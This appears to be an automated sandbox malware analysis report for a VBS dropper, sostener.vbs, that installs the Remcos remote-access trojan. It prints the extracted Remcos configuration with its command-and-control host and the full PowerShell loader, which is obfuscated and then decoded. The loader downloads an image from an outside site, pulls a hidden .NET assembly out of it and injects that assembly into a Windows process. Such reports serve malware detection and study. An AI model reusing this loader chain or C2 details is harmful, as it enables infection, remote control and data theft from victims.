Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2024 11:43
Static task
static1
Behavioral task
behavioral1
Sample
sostener.vbs
Resource
win7-20240508-en
General
-
Target
sostener.vbs
-
Size
210KB
-
MD5
0f8dfb470e4e95aad3aca2bdec3e64ad
-
SHA1
af0979c4780e47a3f44a428b7f7f839434e0a43b
-
SHA256
d99ef4f74f7929ccab7db338318181e2813b7d4e9259a95e6d1a70441e52f4ff
-
SHA512
2aa4ec1dd2fe240754e24efb2c6675d6bb6822cd27ab0c88ffb018c00349e7bdbfb15c3771ba9eb82bc4df3ae452151586abba052b24dcff24bf8944768504e6
-
SSDEEP
1536:ben2+mzXdnsE+tZsd99CObiFCocEW1aJK66n5yhtW0/5JpWn4c1Ig0BfbUZlu9gn:YEsZsdg9JK6X/vc+g0BfcQ7P8
Malware Config
Extracted
remcos
FENIX
newssssssssssssss.duckdns.org:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-NDSLIH
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
WScript.exepowershell.exeflow pid process 8 2944 WScript.exe 11 2944 WScript.exe 15 2944 WScript.exe 22 4512 powershell.exe 24 4512 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4512 powershell.exe 1176 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4512 set thread context of 1080 4512 powershell.exe AddInProcess32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1176 powershell.exe 1176 powershell.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe 4512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 4512 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
AddInProcess32.exepid process 1080 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2944 wrote to memory of 1176 2944 WScript.exe powershell.exe PID 2944 wrote to memory of 1176 2944 WScript.exe powershell.exe PID 1176 wrote to memory of 4512 1176 powershell.exe powershell.exe PID 1176 wrote to memory of 4512 1176 powershell.exe powershell.exe PID 4512 wrote to memory of 4852 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 4852 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 4852 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe PID 4512 wrote to memory of 1080 4512 powershell.exe AddInProcess32.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreDDgTreDgTreLwBjDgTreEEDgTreYwBSDgTreGEDgTreLwBkDgTreC8DgTreZQBlDgTreC4DgTreZQB0DgTreHMDgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/cAcRa/d/ee.etsap//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\remcos\registros.datFilesize
144B
MD5407057db598934720788542384bd86b0
SHA188acae276f46da90da7a1524f5550660ef678437
SHA2562a86015d206adc73d36d24ad18d2e5c133b2781767f444df468339d58a409872
SHA5129e3bb4ecceebbcd9893b6d2a6515b566d069f8a1aad3f0af9560e4bd35cb897140aeed1745b69543533be2f5823be9519b84292db411806e64ffdae10c35ee6b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zy4sfk2a.5wl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1080-78-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-52-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-39-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-36-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-127-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-125-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-124-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-122-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-44-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-46-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-47-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-49-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-50-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-79-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-53-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-55-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-56-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-57-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-35-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-59-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-60-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-61-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-63-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-64-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-81-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-67-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-69-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-70-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-71-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-73-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-74-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-75-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-90-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-121-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-66-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-82-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-84-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-85-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-87-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-88-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-32-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-91-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-93-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-94-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-96-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-97-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-99-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-100-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-102-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-103-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-105-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-106-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-107-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-108-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-110-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-111-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-113-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-114-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-116-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-117-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-118-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1080-120-0x0000000000400000-0x0000000000482000-memory.dmpFilesize
520KB
-
memory/1176-9-0x00007FF849203000-0x00007FF849205000-memory.dmpFilesize
8KB
-
memory/1176-43-0x00007FF849200000-0x00007FF849CC1000-memory.dmpFilesize
10.8MB
-
memory/1176-21-0x00007FF849200000-0x00007FF849CC1000-memory.dmpFilesize
10.8MB
-
memory/1176-20-0x00007FF849200000-0x00007FF849CC1000-memory.dmpFilesize
10.8MB
-
memory/1176-19-0x000002DC7CCB0000-0x000002DC7CCD2000-memory.dmpFilesize
136KB
-
memory/4512-31-0x00000214A0000000-0x00000214A02C0000-memory.dmpFilesize
2.8MB